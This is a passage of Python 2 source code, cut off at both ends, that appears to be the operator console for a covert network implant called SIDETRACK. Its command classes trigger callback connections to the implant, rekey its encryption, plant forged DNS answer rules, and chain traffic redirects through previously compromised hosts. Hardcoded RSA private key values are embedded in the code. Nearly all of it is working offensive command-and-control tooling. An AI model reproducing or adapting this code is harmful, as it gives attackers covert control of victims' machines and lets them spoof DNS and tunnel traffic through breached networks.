"MINFO": rtype = 14 elif rtype == "MX": rtype = 15 elif rtype == "TXT": rtype = 16 elif rtype == "AXFR": rtype = 252 elif rtype == "MAILB": rtype = 253 elif rtype == "MAILA": rtype = 254 elif rtype == "*": rtype = 255 return rtype def ClassConvert(self, rclass): #print "In ClassConvert %d" % (rclass) if type(rclass) != type(''): if rclass == 1: rclass = "IN" elif rclass == 2: rclass = "CS" elif rclass == 3: rclass = "CH" elif rclass == 4: rclass = "HS" return rclass def ConvertClass(self, rclass): if type(rclass) != type(0): rclass = string.upper(rclass) if rclass == "IN": rclass = 1 elif rclass == "CS": rclass = 2 elif rclass == "CH": rclass = 3 elif rclass == "HS": rclass = 4 return rclass def ConvertFlags(self, flags): # qr rd ra retFlags = 0 if type(flags) != type(0): flags = string.upper(flags) if flags == "RA": retFlags = retFlags | 0x0080L if flags == "AA": retFlags = retFlags | 0x0400L return retFlags def SectionConvert(self,section): if type(section) != type(''): if section == 0: section = "query" elif section == 1: section = "ans" elif section == 2: section = "auth" elif section == 3: section = "add" return section def ConvertSection(self,section): if type(section) != type(0): section = string.upper(section) if section[:1] == "Q": section = 0 elif section[:2] == "AN": section = 1 elif section[:2] == "AU": section = 2 elif section[:2] == "AD": section = 3 return section def NameConvertName(self, name): ret = '' sp = 0 if type(name) != type(0): while name[sp:sp+1] != '\000': namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0] #print namelen if sp != 0: ret = ret + '.' for i in range(1,namelen+1): val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0] if val >= 32 and val < 127: ret = ret + name[sp+i:sp+i+1] else: raise TypeError, self.HexConvert(name) sp = sp+1+namelen return ret def NameConvert(self, name, padding=0): try: return self.NameConvertName(name) except: return self.HexConvert(name, padding) def ConvertName(self, name): ret = '' regExpr = re.compile("^[a-zA-Z0-9-_.]*$") if type(name) != type(0x0L): reg = regExpr.search(name) if reg != None: dots = string.splitfields(name,".") for i in range(len(dots)): ret = ret + chr(len(dots[i])) + dots[i] ret = ret + '\000' return ret else: return name else: return struct.pack("!H",name) def FlagConvert(self, flag): if flag == 0: return "Ignore" elif flag == 1: return "Count" elif flag == 2: return "Active" def HexConvert(self,data,pad=0): ret = '' padding = '' for i in range(pad): padding = padding + ' ' for i in range(len(data)): if i % 16 == 0 and i != 0: ret = ret + '\n' + padding myNum = struct.unpack("!H", '\000'+data[i:i+1])[0] ret = ret + "%02x " % myNum ret = ret + '\n' + padding + "(%d)" % (len(data)) return ret class SIDETRACK(base.Implant): def __init__(self, session, proto): base.Implant.__init__(self, session, proto) self.name = 'SIDETRACK' self.newCV = None self.targetopts = self.session.target.GetImplantOpts('sidetrack') self.version = self.targetopts['VERSION'] if self.version >= 2.0: self.cipher = crypto.rc6() else: self.cipher = crypto.rc5() self.cipher.SetKey(self.targetopts['KEY']) self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L self.packetSize = 450 self.timediff = self.session.target.timediff self.localRedir = None self.parent = None self.children = [] self.rules = [] def RegisterCommands(self): self.AddCommand('ping', echocmd.ECHOCMD_PING) self.AddCommand('status', echocmd.ECHOCMD_STATUS) self.AddCommand('done', echocmd.ECHOCMD_DONE) self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE) self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF) self.AddCommand('incision', echocmd.ECHOCMD_INCISION) self.AddCommand('rekey', echocmd.ECHOCMD_REKEY) self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY) self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY) self.AddCommand('key', echocmd.ECHOCMD_KEY) self.AddCommand('init', SIDECMD_INIT) self.AddCommand('dnsadd', SIDECMD_DNSADD) self.AddCommand('dnsrm', SIDECMD_DNSREMOVE) self.AddCommand('dnsset', SIDECMD_DNSSET) self.AddCommand('dnsaction', SIDECMD_DNSACTION) self.AddCommand('dnsraw', SIDECMD_DNSRAW) self.AddCommand('dnslist', SIDECMD_DNSLIST) self.AddCommand('dnsload', SIDECMD_DNSLOAD) self.AddCommand('dnssave', SIDECMD_DNSSAVE) self.AddCommand('rediradd', SIDECMD_REDIRADD) self.AddCommand('redirlist', SIDECMD_REDIRLIST) self.AddCommand('redirset', SIDECMD_REDIRSET) self.AddCommand('redirrm', SIDECMD_REDIRREMOVE) self.AddCommand('connlist', SIDECMD_CONNLIST) self.AddCommand('connrm', SIDECMD_CONNREMOVE) self.AddCommand('stunload', SIDECMD_UNLOAD) self.AddCommand('connect', SIDECMD_CONNECT) self.AddCommand('cclist', SIDECMD_CCLIST) self.AddCommand('ccremove', SIDECMD_CCREMOVE) self.AddCommand('multiaddr', SIDECMD_MULTIADDR) ########################################################################## # HASANOTHERADDRESS class ######################################################################### class SIDECMD_MULTIADDR(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "multiaddr" self.usage = "multiaddr <0|1>" self.info = "Let pyside know that the target has multiple addresses" def run(self, value=1): self.implant.session.target.hasAnotherAddress = value return (1, "Value updated") ########################################################################## # CONNECT class ######################################################################### class SIDECMD_CONNECT(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "connect" self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>" self.info = "Connect to SIDETRACK" def parseHostInfo(self,host): #split the ip from the ports res = string.split(host,":") if len(res) == 1: raise ValueError, host elif len(res) == 2: ports = string.split(res[1],"/") if len(ports) != 2: raise ValueError, host if ports[0] == "*": raise ValueError, ports[0] else: ports[0] = eval(ports[0]) if ports[1] == "*": raise ValueError, ports[1] else: ports[1] = eval(ports[1]) try: host = None ipaddr = self.ConvertIP(res[0]) except: # host references a session host = base.sessionDict[res[0]] ipaddr = self.ConvertIP(host.target.GetIP()) return host,ipaddr,ports[0],ports[1] else: raise ValueError, host def run(self,hostinfo,fport): # Parse the ports prevRule = None tempRule = None localRedir = None host,laddr,lport,cbport = self.parseHostInfo(hostinfo) if fport == 0: PORT = 500 #open the listener try: sock = socket(AF_INET,SOCK_STREAM,0) sock.bind(('',lport)) sock.listen(2) except error, message: return (0, "Could not open port %d %s" % (lport,message)) # See if the user entered another host if host != None: self.implant.parent = host #hpn is the hop prior to host (might just be "me") hpn = host.implant.parent.name myname = host.name hostinfo = re.sub(myname,hpn,hostinfo) # Testing localRedir = REDIRECT(self,0,10800,10800,6,\ self.ConvertIP(self.implant.session.target.ip), \ self.ConvertIP(self.implant.session.target.ip), 0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0) localRedir.add(0) self.implant.session.localRedir = localRedir # Add a redirect (on the previous host) for this connection cmd = host.GetCommand('rediradd') base.ccSupport = 1 res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h") base.ccSupport = 0 if res[0] == 0: return res # Let the previous implant know this redirect rule is in support # of a command and control connection prevRule = cmd.redir if prevRule != None: prevRule.ccPassthru = self.implant.session # Add a temporary rule to allow the trigger to be passed to target base.ccSupport = 1 if fport == 0: res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix") else: res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix") base.ccSupport = 0 base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff)) if res[0] == 0: if prevRule != None: prevRule.remove() return (0, "Unable to establish redir for port %d: %s"%(fport,res[1])) tempRule = cmd.redir else: localRedir = None prevRule = None self.implant.session.localRedir = None #add the rule if tempRule == None or (tempRule != None and \ cmd.implant.session.target.hasAnotherAddress == 0): rule = base.redir.listen(laddr,\ self.ConvertIP(self.implant.session.target.ip),\ fport,lport,cbport,\ self.implant.timediff, \ self.implant.cipher.GetKey()) else: rule = base.redir.listen(tempRule.ST_ip,\ self.ConvertIP(self.implant.session.target.ip),\ fport,lport,cbport,\ self.implant.timediff, \ self.implant.cipher.GetKey()) #Make the connection if fport == 0: conn = socket(AF_INET,SOCK_DGRAM,0) conn.bind(('',PORT)) conn.connect((self.implant.session.target.ip,PORT)) f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null") d = f.read() f = None data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \ d[16:20] + struct.pack("!L", 0x154) + d[20:332] conn.send(data) conn.close() #accept self.implant.protocol.sock,addr = sock.accept() else: #conn = socket(AF_INET,SOCK_STREAM,0) # STUB: Catch this in a try statement try: # esev - 6/24/03 #conn.connect((self.implant.session.target.ip,fport)) #conn.close() #conn = None rawtcp.sendFakeConnection(self.implant.session.target.ip,fport) # STUB: Put a timeout here #accept self.implant.protocol.sock,addr = sock.accept() except: base.redir.delete(rule) sock.close() sock = None #if conn != None: # conn.close() if localRedir != None: localRedir.remove() if prevRule != None: prevRule.remove() if tempRule != None: tempRule.remove() base.sessionDict[self.implant.session.name] = None return (1,"Canceled by user, target %s removed" % self.implant.session.name) sock.close() sock = None # Set the CC redirect to inactive. This will not effect the # current connection..only prevent the rule from getting in the way if prevRule != None: prevRule.set(0) #if there is a connection back return 1 else 0 if self.implant.protocol.sock: cmd = self.implant.session.GetCommand("init") res = cmd.run() # remove the temporary redirect if tempRule != None: tempRule.remove() # remove the connection rule base.redir.delete(rule) if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) return (1, "Connected") else: # remove the temporary redirect if tempRule != None: tempRule.remove() # remove the connection rule base.redir.delete(rule) return (0, "Could not connect") ########################################################################## # INIT class # op code: 0x20 ######################################################################### class SIDECMD_INIT(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "init" self.usage = "init" self.info = "Initialize the implant" def run(self): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) cmd = self.implant.session.GetCommand("ping") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) for i in range(3): cmd = self.implant.session.GetCommand("rekey") res = cmd.run() if res[0] != 0: break if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) cmd = self.implant.session.GetCommand("switchkey") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) cmd = self.implant.session.GetCommand("status") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) return (1,"Initialization complete") ########################################################################## # DNSREAD class ######################################################################### class SIDECMD_DNSLOAD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsload" self.usage = "dnsload <filename>" self.info = "Send DNS data from a file to the target" #------------------------------------------------------------------------- # Name : ProcessArg # Purpose: Tests to see if the argument is a string or number # Receive: arg - The argument to test # Return : The original string if a number, or a quoted string if not #------------------------------------------------------------------------- def ProcessArg(self,arg): if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \ re.match('^0x[0-9a-fA-F]+L?', arg) != None): return arg else: return '"' + arg + '"' def runRule(self, args): cmd = SIDECMD_DNSADD() cmd.implant = self.implant argString = 'myRes = cmd.run(' for i in range(1,len(args)): if i == 1: argString = argString + self.ProcessArg(args[i]) else: argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) if myRes and myRes[0]: self.lastRule = myRes[0] def runSet(self, args): cmd = SIDECMD_DNSSET() cmd.implant = self.implant argString = 'myRes = cmd.run(self.lastRule' for i in range(1,len(args)): argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) def runCmd(self, args): cmd = SIDECMD_DNSACTION() cmd.implant = self.implant argString = 'tmp = cmd.run(self.lastRule' for i in range(len(args)): argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) def run(self, filename): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) file = open(filename,'r') self.lastRule = 0 while 1: line = file.readline() if not line: line = None return (1, "Input from file complete") args = base.SplitCommandString(string.strip(line)) if len(args) == 0: continue elif args[0][0:1] == '#' or args[0] == '': continue elif args[0] == "rule": self.runRule(args) print "Rule %d added\n" % (self.lastRule) elif args[0] == "set": self.runSet(args) else: self.runCmd(args) return (0, "problem") ########################################################################## # DNSADD class # op code: 0x18 ######################################################################### class SIDECMD_DNSADD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsadd" self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]" self.info = "Add a DNS entry into sidetrack (see also dnsset)" self.op = 0x18L def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) ipStr = self.ConvertIP(ip) maskStr = self.ConvertIP(mask) rtype = self.ConvertType(rtype) rclass = self.ConvertClass(rclass) name = self.ConvertName(name) length = self.ConvertTime(length) self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\ rtype,rclass,len(name)) +name self.Query() if( self.op == 0x18L and self.res == 0x1L ): dnsRes = struct.unpack("!l",self.data[0:4])[0] return (dnsRes, "Add successful, rule number: %d" % dnsRes) else: return (0, "Add failed") ########################################################################## # DNSREMOVE class # op code: 0x19 ######################################################################### class SIDECMD_DNSREMOVE(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsrm" self.usage = "dnsrm <rule|all>" self.info = "Remove a dns rule" self.op = 0x19L def run(self,rule): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if type(rule) == type("a") and string.upper(rule)[:1] == 'A': rule = 0 self.data = struct.pack("!l",rule) self.Query() if self.op == 0x19L and self.res == 0x01L: return (1,"Rule(s) removed") else: return (0,"unable to remove rule(s)") ########################################################################## # DNSSET class # op code: 0x20 ######################################################################### class SIDECMD_DNSSET(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsset" self.usage = "dnsset <rule> <ignore|count|active>" self.info = "Turn a DNS rule on or off" self.op = 0x20L def run(self,rule,onoff): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) self.data = struct.pack("!l",rule) if onoff[0:1] == "a" or onoff[0:1] == "A": self.data = self.data + struct.pack("!h", 2) elif onoff[0:1] == "c" or onoff[0:1] == "C": self.data = self.data + struct.pack("!h", 1) else: self.data = self.data + struct.pack("!h", 0) self.Query() if self.op == 0x20L and self.res == 0x01L: return (1,"rule %d successfully set to %s" %\ (rule, onoff)) else: return (0,"unable to set rule to %s" % onoff) ########################################################################## # DNSRAW class # op code: 0x21 ######################################################################### class SIDECMD_DNSRAW(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsraw" self.info = "Upload a binary dns response packet" self.usage = "dnsraw <rule> <filename>" self.op = 0x21L def run(self, rule, filename): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0, msg) file = open(filename,'r') file.seek(0,2) filesize = file.tell() file.seek(0,0) maxchunksize = self.implant.packetSize - 34 numchunks = filesize / maxchunksize if filesize%maxchunksize > 0: numchunks = numchunks + 1 for i in range(numchunks): self.data = file.read(maxchunksize) self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\ len(self.data)) + self.data self.Query() if (self.op != 0x21L or self.res != 0x1L): return (0,"Binary upload failed at chunk %d"%(i+1)) return (1,"Binary upload of %d chunks successful"%(numchunks)) ########################################################################## # DNSACTION class # op code: 0x21 ######################################################################### class SIDECMD_DNSACTION(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsaction" self.info = "Set the action for a rule" self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>" self.op = 0x21L def run(self,rule,sect,name,rtype,rclass,ttl,data): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) name = self.ConvertName(name) sect = self.ConvertSection(sect) rtype = self.ConvertType(rtype) rclass = self.ConvertClass(rclass) ttl = self.ConvertTime(ttl) if rtype == 1: data = self.ConvertIP(data) else: data = self.ConvertName(data) self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\ rclass,\ len(name),\ len(data))+\ name+data self.Query() if self.op == 0x21L and self.res == 0x01L: return (1,"%s action for rule %d set successfully" % \ (sect, rule)) else: return (0,"Could not set action") ########################################################################## # DNSLIST class # op code: 0x22 ######################################################################### class SIDECMD_DNSLIST(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnslist" self.usage = "dnslist [-v] [rule] [section]" self.info = "Retrieve a section of a rule from SIDETRACK" self.op = 0x22L def ParseReturn(self): if self.implant.version < 2.0: self.lastport = 0 (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\ self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \ self.dnsflags, self.rtype, self.rclass, self.rsec, \ self.nlen, self.dlen) =\ struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48]) self.dnsname = self.data[48:48+(self.nlen)] self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)] else: (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\ self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \ self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \ self.nlen, self.dlen) =\ struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50]) self.dnsname = self.data[50:50+(self.nlen)] self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)] def GetRuleString(self): printOut = "%10d %s/%s %-7s %s\n" % \ (self.rule, self.ConvertToDot(self.fromIP), self.ConvertToDot(self.fromMask), self.FlagConvert(self.flag), time.ctime(self.longevity+self.implant.timediff)[4:]) printOut = printOut + " %5s: %-5d %s:%d %s\n" %\ ("count", self.seen, self.ConvertToDot(self.lastIP), self.lastport, time.ctime(self.lastTime + self.implant.timediff)) return printOut + self.GetSectionString() def GetRule(self,rule,sec=0): sec = self.ConvertSection(sec) #print "Getting section %d of rule %d\n" % (sec,rule) self.data = struct.pack("!LLH",rule,0,sec) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() printOut = self.GetRuleString() return (1, printOut) else: return (0,"Error receiving result\n") def GetNextRule(self,lastRule,sec=0): sec = self.ConvertSection(sec) print "Getting section %d of rule after %d\n" % (sec,lastRule) self.data = struct.pack("!LLH",0,lastRule,sec) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() if self.retVal == 0: lastRule = self.rule elif self.retVal == 2: lastRule = -2 else: lastRule = -1 if lastRule == -2: lastRule = -1 printOut = 'There are currently no rules' else: printOut = self.GetRuleString() return (lastRule, printOut) elif lastRule == 0: print self.res return (0,"There are currently no rules!") else: return (0,"Error receiving result\n") def GetSectionString(self): printOut = " %5s: %-5s %-3s %-5d " % \ (self.SectionConvert(self.rsec), self.TypeConvert(self.rtype), self.ClassConvert(self.rclass), self.ttl&0xffffffL) if self.nlen: try: printOut = printOut + "%s\n" % \ (self.NameConvertName(self.dnsname)) except: printOut = printOut + "\n N: %s\n" %\ (self.HexConvert(self.dnsname,10)) if self.dlen: if self.rtype == 1 and self.dlen == 4: printOut = printOut + \ " D: %s\n" % \ (self.ConvertToDot(self.dnsdata)) else: printOut = printOut + \ " D: %s\n" %\ (self.NameConvert(self.dnsdata,10)) return printOut def GetSection(self,rule,section): print "Getting section %d of rule %d\n" % (section,rule) self.data = struct.pack("!LLH",rule,0,section) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() if self.rsec == 4: return (1, '') return (1,self.GetSectionString()) else: return (0, "Could not get section") def preRuleString(self): return "-----------------------------------------------------------------------\n" def postRuleString(self): return '' def runAll(self): moreRules = 1 lastRule = 0 printOut = '' while moreRules: res = self.GetNextRule(lastRule) if res[0] == 0: return res elif res[0] == -1: moreRules = 0 lastRule = self.rule else: lastRule = res[0] printOut = printOut + self.preRuleString() printOut = printOut + res[1] for i in range(1,4): sec = self.GetSection(lastRule, i) if sec[0] == 0: return (0, printOut) printOut = printOut + sec[1] printOut = printOut + self.postRuleString() return (1, printOut) def run(self,rule=-1, sec=-1, ext=-1): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if rule == -1: lastRule = 0 moreRules = 1 printOut = '' while moreRules: res = self.GetNextRule(lastRule) if res[0] == 0: return res elif res[0] == -1: moreRules = 0 lastRule = self.rule else: lastRule = res[0] printOut = printOut + res[1] elif rule == "-v": if sec == -1: return self.runAll() else: if ext == -1: res = self.GetRule(sec) if res[0] == 0: return res printOut = res[1] for i in range(1,4): sd = self.GetSection(sec, i) if sd[0] == 0: return (0, printOut) printOut = printOut + sd[1] else: return self.GetRule(sec,ext) else: if sec == -1: return self.GetRule(rule) else: # Rule != 0 and sec != -1 return self.GetRule(rule,sec) return (1,printOut) ########################################################################## # DNSREAD class ######################################################################### class SIDECMD_DNSSAVE(SIDECMD_DNSLIST): def __init__(self): SIDECMD_DNSLIST.__init__(self) self.name = "dnssave" self.usage = "dnssave [rule] [filename]" self.info = "Save one of more rules" def ToOct(self, data): if type(data) == type(0x0L) or type(data) == type(0): ret = '' if data > 255: if data > 65535: if data > 16777215: ret = ret + "\\%o" % ((int)(data/16777216)&0xffL) ret = ret + "\\%o" % ((int)(data/65536)&0xffL) ret = ret + "\\%o" % ((int)(data/256)&0xffL) ret = ret + "\\%o" % (data & 0xffL) else: reg = regex.compile("^[a-zA-Z0-9-_.]*$") ret = '' for i in range(len(data)): if reg.match(data[i:i+1]) != None: ret = ret + data[i:i+1] else: ret = ret + "\\%o" % \ struct.unpack("!H",'\000'+data[i:i+1])[0] return '"' + ret + '"' def NameConvertName(self, name): reg = regex.compile("^[a-zA-Z0-9-_.]*$") ret = '' sp = 0 if type(name) != type(0): while name[sp:sp+1] != '\000': namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0] #print namelen if sp != 0: ret = ret + '.' for i in range(1,namelen+1): if reg.match(name[sp+i:sp+i+1]) != None: ret = ret + name[sp+i:sp+i+1] else: raise TypeError, self.ToOct(name) sp = sp+1+namelen return ret def NameConvert(self, name, padding=0): try: return self.NameConvertName(name) except: return self.ToOct(name) def GetSectionString(self): printOut = "%s %s %s %s %d " % \ (self.SectionConvert(self.rsec), self.NameConvert(self.dnsname), self.TypeConvert(self.rtype), self.ClassConvert(self.rclass), self.ttl&0xffffffL) if self.dlen: if self.rtype == 1 and self.dlen == 4: printOut = printOut + self.ConvertToDot(self.dnsdata) else: printOut = printOut + self.NameConvert(self.dnsdata,10) return printOut + '\n' def GetRuleString(self): printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \ (self.ConvertToDot(self.fromIP), self.ConvertToDot(self.fromMask), self.longevity - self.rule, self.TypeConvert(self.rtype), self.ClassConvert(self.rclass), self.NameConvert(self.dnsname), self.dnsflags) return printOut def preRuleString(self): return "# -----------------------------------------------------------------------\n" def postRuleString(self): return "set %s\n" % (self.FlagConvert(self.flag)) def run(self,rule=-1, file=-1): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if rule == -1: # All Rules to stdout return self.runAll() elif type(rule) == type(''): # All rules to file out = open(rule,'w') res = self.runAll() if res[0] == 0: return res out.write(res[1]) out = None return res elif file == -1: # Single rule to stdout res = self.GetRule(rule) if res[0] == 0: return res printOut = res[1] for i in range(1,4): sd = self.GetSection(rule,i) if sd[0] == 0: return (0,printOut + sd[1]) printOut = printOut + sd[1] return (1,printOut + self.postRuleString()) else: # Single rule to file out = open(file,"w") res = self.GetRule(rule) if res[0] == 0: return res printOut = res[1] for i in range(1,4): sd = self.GetSection(rule,i) if sd[0] == 0: return (0,printOut + sd[1]) printOut = printOut + sd[1] printOut = printOut + self.postRuleString() out.write(printOut) out = None return (1,printOut) ############################################################################# # REDIRADD class # opcode 0x23 ############################################################################# class SIDECMD_REDIRADD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "rediradd" self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n" self.info = "Add a REDIRECT rule into SIDETRACK's rule set" self.op = 0x23L def parseProto(self,proto): origproto = proto if type(proto) == type ('a'): proto = string.upper(proto)[:1] if proto == "T": proto = 6 elif proto == "U": proto = 17 elif proto == "I": proto = 1 elif proto == "A": proto = 0 else: raise ValueError, origproto return proto def parseHostInfo(self,host): #split the ip from the ports res = string.split(host,":") if len(res) == 1: try: host = None ipaddr = self.ConvertIP(res[0]) except: host = base.sessionDict[res[0]] ipaddr = self.ConvertIP(host.target.GetIP()) return host,ipaddr,-1,-1 elif len(res) == 2: ports = string.split(res[1],"/") if len(ports) != 2: raise ValueError, host if ports[0] == "*": ports[0] = -1 else: ports[0] = eval(ports[0]) if ports[1] == "*": ports[1] = -1 else: ports[1] = eval(ports[1]) try: host = None ipaddr = self.ConvertIP(res[0]) except: host = base.sessionDict[res[0]] ipaddr = self.ConvertIP(host.target.GetIP()) return host,ipaddr,ports[0],ports[1] else: raise ValueError, host def run(self,protocol,attacker,target, opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None, opt6=None,opt7=None,opt8=None,opt9=None,first=1): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg,0) optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9] allProtoAT = 0 allProtoTA = 0 allRedir = 0 ttl_reset = 1 ttl_mod = 0 munge = 1 encrypt = 0 afix = 1 tfix = 1 ident = 0 seq = 0 insert = 0 samesum = 0 longevity = 14400 conn_to = 14400 cmd = None localredir = 0 if first: munge = 0 encrypt = 1 protocol = self.parseProto(protocol) if protocol == 0: allRedir = 1 host,A_ip,A_port,SA_port = self.parseHostInfo(attacker) host2,T_ip,T_port,ST_port = self.parseHostInfo(target) if host != None: hpn = host.implant.parent.name myname = host.name attacker = re.sub(myname,hpn,attacker) cmd = host.GetCommand('rediradd') res = cmd.run(protocol,attacker,\ "%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\ opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0) if res[0] == 0: return res if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1: A_ip = struct.pack("!L",res[2]) if SA_port == -1 and T_port != -1: base.db(1,"problem") raise ValueError, "Invalid ports" if SA_port != -1 and T_port == -1: base.db(1,"problem") raise ValueError, "Invalid ports" if ST_port == -1 and A_port != -1: base.db(1,"problem") raise ValueError, "Invalid ports" if ST_port != -1 and A_port == -1: base.db(1,"problem") raise ValueError, "Invalid ports" if SA_port == -1 and T_port == -1: allProtoAT = 1 SA_port = 0 T_port = 0 if ST_port == -1 and A_port == -1: allProtoTA = 1 ST_port = 0 A_port = 0 # Parse the args i=0 while i < len(optList): if optList[i] == None: break elif string.upper(optList[i])[:3] == '-TT': i = i+1 if type(optList[i]) == type(1): ttl_mod = optList[i] if optList[i] < 0: ttl_reset = 0 else: ttl_reset = 1 elif string.upper(optList[i])[:1] == 'R': ttl_mod = 0 ttl_reset = 1 elif optList[i][0] == '+' or optList[i][0] == '-': ttl_mod = eval(optList[i]) ttl_reset = 0 else: raise ValueError, optList[i] #if ttl_reset == 0: # ttl_mod = struct.pack("!H",ttl_mod) #else: # ttl_mod = struct.pack("!h",ttl_mod) elif string.upper(optList[i])[:2] == '-I': i = i+1 insert = optList[i] elif string.upper(optList[i])[:2] == '-L': i = i+1 longevity = self.ConvertTime(optList[i]) elif string.upper(optList[i])[:2] == '-C': i = i+1 conn_to = self.ConvertTime(optList[i]) elif string.upper(optList[i])[:2] == '-N': munge = 0 encrypt = 0 elif string.upper(optList[i])[:2] == '-E': encrypt = 1 elif string.upper(optList[i])[:2] == '-A': afix = 0 elif string.upper(optList[i])[:3] == '-TF': tfix = 0 elif string.upper(optList[i])[:2] == '-S': samesum = 1 else: raise ValueError, optList[i] i = i + 1 if T_ip == self.ConvertIP(self.implant.session.target.ip): encrypt = 0 munge = 0 localredir = 1 flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \ | encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \ | allProtoTA << 8 | base.ccSupport << 9 | samesum << 10 rd = crypto.GetRandom() if localredir == 0: ident = struct.unpack("!H",rd[0:2])[0] if munge: munge = struct.unpack("!L",rd[2:6])[0] if munge & 1L == 0: munge = munge + 1 if munge & 0xffL == 1: munge = munge + 10 if protocol 